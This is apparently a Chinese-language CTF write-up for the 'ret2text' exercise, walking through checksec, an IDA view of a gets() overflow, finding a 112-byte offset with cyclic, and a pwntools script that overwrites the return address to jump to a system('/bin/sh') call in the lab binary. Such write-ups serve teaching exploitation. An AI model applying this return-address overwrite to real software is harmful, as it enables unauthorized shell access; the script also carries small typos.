ret2text writeup

first 

checksec ret2text

Stack: No canary found

NX:      NX enabled

这里Stack 保护措施，如果开启的话会在栈中的返回地址前放一个随机值，如果被覆盖，程序就会报错退出

NX是 no execution 如果开启的话就不能让IP寄存器指向堆、栈........

ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked

32-bit

dynamically linked 

获得了基本的信息之后就能运行程序，分析他的功能

经过检测，程序就一个输入点，我们用ida检查程序

int __cdecl main(int argc, const char **argv, const char **envp)

{

  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);

  setvbuf(_bss_start, 0, 1, 0);

  puts("There is something amazing here, do you know anything?");

  gets((char *)&v4);

  printf("Maybe I will tell you next time !");

  return 0;

}

可以很清楚的看到，gets函数读取无限制的用户输入到栈上，很显然，就可以覆盖到返回地址，

那我们首先就来做这一步，控制IP寄存器

我们这里知道了gets函数读取无限制的用户输入到栈上，首先要确认输入到多少位可以覆盖到返回地址

这里用cyclic,

cyclic -h 

cyclic 200

cyclic会生成一段字

gdb ./ret2text(用加载出来的peda 模块来继续)

gdb-peda$ run

（此处将cyclic 生成的字符，填写进去）

Starting program: /home/root123/下载/pwn /ret2text There is something amazing here, do you know anything?aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabMaybe I will tell you next time !Program received signal SIGSEGV, Segmentation fault

Invalid $PC address: 0x62616164

找到报错点

cyclic -l 0x62616164

112

下面就开始写exp

from pwn import *

p = process('./ret2text')

p.sendline('a'*112 + xxxX)                //这里很显然。xxxx就可以控制返回地址了，那我们让程序跳到哪里去执行呢？

我们可以检查程序有些什么功能

objdump -R re2text

stone@stone-virtual-machine:~$ objdump -R ret2text ret2text：

文件格式 elf32-i386 

DYNAMIC RELOCATION RECORDS OFFSET TYPE VALUE 08049ffc R_386_GLOB_DAT __gmon_start__ 0804a040 R_386_COPY stdin@@GLIBC_2.0 0804a060 R_386_COPY stdout@@GLIBC_2.0 0804a00c R_386_JUMP_SLOT printf@GLIBC_2.0 0804a010 R_386_JUMP_SLOT gets@GLIBC_2.0 0804a014 R_386_JUMP_SLOT time@GLIBC_2.0 0804a018 R_386_JUMP_SLOT puts@GLIBC_2.0 0804a01c R_386_JUMP_SLOT system@GLIBC_2.0 0804a020 R_386_JUMP_SLOT __gmon_start__ 0804a024 R_386_JUMP_SLOT srand@GLIBC_2.0 0804a028 R_386_JUMP_SLOT __libc_start_main@GLIBC_2.0 0804a02c R_386_JUMP_SLOT setvbuf@GLIBC_2.0 0804a030 R_386_JUMP_SLOT rand@GLIBC_2.0 0804a034 R_386_JUMP_SLOT __isoc99_scanf@GLIBC_2.7

可以看到这里提供了system 函数，我们检查他在什么地方使用的（在ida 中查看）

int system(const char *command)

{

  return system(command);

}

-------------------------------------------------------------------------------------

text:08048632 mov eax, [ebp+input]

.text:08048635                cmp    eax, [ebp+secretcode]

.text:08048638                jnz    short locret_8048646

.text:0804863A                mov    dword ptr [esp], offset command ; "/bin/sh"

.text:08048641                call    _system

.text:08048646

.text:08048646 locret_8048646:                        ; CODE XREF: secure+3Bj

.text:08048646                leave

.text:08048647                retn

.text:08048647 secure          endp

可以看出在0804863A 提供了shell的功能只要跳转到这里即可获得shell

那我们用这个地址覆盖栈到返回地址

完整的EXP

rom pwn import*

p = process('./ret2text')

p.sendline('a'*112+p32(0x0804863A))

p.interactive()